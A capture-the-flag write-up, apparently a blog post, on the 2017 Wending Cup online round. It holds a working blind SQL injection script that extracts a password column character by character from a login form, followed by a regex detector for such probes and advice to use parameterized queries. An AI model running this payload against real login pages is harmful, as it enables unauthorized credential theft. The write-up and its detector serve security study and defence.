Notes on the 2017 Wending Cup (问鼎杯) online round

I slacked off at home for half the summer break, and my skills have dropped quite a bit.

Web1

A PHP floating-point precision issue.

Web2

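In the head I found hacked_by_Voldemort along with the password,

so I logged in directly.

Under admin --> manager there is some ajax code; just POST key= with that string of digits and that's it.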

Web3

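Injection.
The double quotes are rather unusual; apart from that there is nothing much to complain about, it's the usual routine.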

```python
# -*- coding:utf-8 -*-

import requests

url = "http://sec2.hdu.edu.cn/ac5c74b64b4b8352ef2f181affb5ac2a/index.php"

# Candidate characters tried at each position of the value
lists = "1234567890abcdefghijklmnopqrstuvwxyz~!@#$%^&*()_+{}:<>?"

flag = ""
for j in range(1, 22):
    for i in lists:
        # The double quote closes the quoted username value; the comparison in
        # the middle is false only when character j of pass equals i
        payload = '1"^(substr(pass,' + str(j) + ',1)<>"' + i + '")^"0'
        data = {"username": payload, "password": "123"}
        contents = requests.post(url, data=data)
        # The script treats "Username error!" as the signal for a matching character
        if "Username error!" in contents.text:
            print(str(j) + "   " + i)
            flag = flag + i
            break
print(flag)
```
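Seen from the server side, the script above leaves a recognizable trail: one client sends many login requests whose username breaks out of its quotes and probes `substr(<column>,<position>,1)` at steadily increasing positions. The detector below is an added example, not part of the original post; the tab-separated log format (client address, then URL-encoded POST body), the client addresses and the threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# substr(<column>,<position>,1): the single-character probe used in the script above
PROBE = re.compile(r"substr(?:ing)?\s*\(\s*[\w.`]+\s*,\s*(\d+)\s*,\s*1\s*\)", re.I)
# A quote directly followed by an operator: the value leaves its string literal
BREAKOUT = re.compile(r"""["']\s*(?:\^|\|\||&&|=|<>|\bor\b|\band\b)""", re.I)

def find_blind_extraction(log_lines, min_positions=3):
    """Return {client: sorted positions probed} for clients that walk a column
    one character at a time across at least min_positions distinct positions."""
    hits = defaultdict(set)
    for line in log_lines:
        client, _, body = line.rstrip("\n").partition("\t")
        for values in parse_qs(body, keep_blank_values=True).values():
            for value in values:
                probe = PROBE.search(value)
                if probe and BREAKOUT.search(value):
                    hits[client].add(int(probe.group(1)))
    return {c: sorted(p) for c, p in hits.items() if len(p) >= min_positions}

def constructed_log():
    """Constructed sample lines in the assumed 'client<TAB>body' format."""
    lines = []
    for pos in range(1, 5):
        for ch in "a1&":
            payload = '1"^(substr(pass,%d,1)<>"%s")^"0' % (pos, ch)
            lines.append("10.0.0.5\t" + urlencode({"username": payload, "password": "123"}))
    # Ordinary login: no probe, no breakout
    lines.append("10.0.0.9\t" + urlencode({"username": "alice", "password": "hunter2"}))
    # Mentions substr but never leaves the string literal
    lines.append("10.0.0.7\t" + urlencode({"username": "substr(pass,1,1)", "password": "x"}))
    # A single probe: recorded, but below the default threshold
    lines.append("10.0.0.8\t" + urlencode({"username": '1"^(substr(pass,1,1)<>"a")^"0', "password": "x"}))
    return lines

if __name__ == "__main__":
    for client, positions in find_blind_extraction(constructed_log()).items():
        print(client, "probed character positions", positions)
```

Detection of this kind is a backstop; binding the username as a query parameter instead of concatenating it into the SQL string is what removes the quote breakout.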

The Cybersecurity Law has to be memorized, and CSAW has to be played~
